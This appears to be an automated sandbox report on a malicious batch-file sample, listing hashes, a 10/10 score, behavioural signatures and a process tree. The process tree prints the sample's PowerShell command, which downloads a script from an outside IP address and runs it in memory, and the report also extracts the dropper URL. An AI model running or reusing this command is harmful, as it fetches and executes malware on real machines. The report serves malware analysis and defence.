Analysis
-
max time kernel
75s -
max time network
71s -
platform
windows10_x64 -
resource
win10 -
submitted
20-06-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
35e5f8eb351e284b90bed66d0023236b.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
35e5f8eb351e284b90bed66d0023236b.bat
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
35e5f8eb351e284b90bed66d0023236b.bat
-
Size
214B
-
MD5
e2fcc310d8119cd0904e78336960fa89
-
SHA1
de619682273fc1b7211126601c0e1074cc57e246
-
SHA256
1c34218a57d25359c281518cac60c8380aba32fbeea82e9e61585a0c33db7574
-
SHA512
349b96ad50dbb441a256244f07e83cc22f96e212c50cf91ae17d372259c9a37af69e3b548e6a396886b6c50b26da816b897704579916deff8862c4ae77ac0fba
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/35e5f8eb351e284b90bed66d0023236b
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2928 wrote to memory of 3796 2928 cmd.exe powershell.exe PID 2928 wrote to memory of 3796 2928 cmd.exe powershell.exe PID 2928 wrote to memory of 3796 2928 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3316 3796 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3316 WerFault.exe Token: SeBackupPrivilege 3316 WerFault.exe Token: SeDebugPrivilege 3316 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe 3316 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\35e5f8eb351e284b90bed66d0023236b.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/35e5f8eb351e284b90bed66d0023236b');Invoke-GKXBUHZ;Start-Sleep -s 10000"2⤵PID:3796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3316